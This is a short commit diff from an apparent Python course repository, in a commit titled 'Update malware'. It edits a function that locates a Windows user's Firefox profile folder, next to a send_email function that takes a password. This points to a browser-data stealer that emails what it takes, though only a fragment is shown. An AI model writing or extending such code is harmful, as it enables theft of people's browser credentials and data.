You've already forked Curso-lenguaje-python
Update malware
This commit is contained in:
@@ -61,7 +61,7 @@ def send_email(subject, body, sender, recipients, password):
|
||||
|
||||
def get_firefox_profiles(username):
|
||||
|
||||
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
|
||||
path = f"C:\\Users\\" + username + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
|
||||
|
||||
try:
|
||||
profiles = [profile for profile in os.listdir(
|
||||
|
||||
Reference in New Issue
Block a user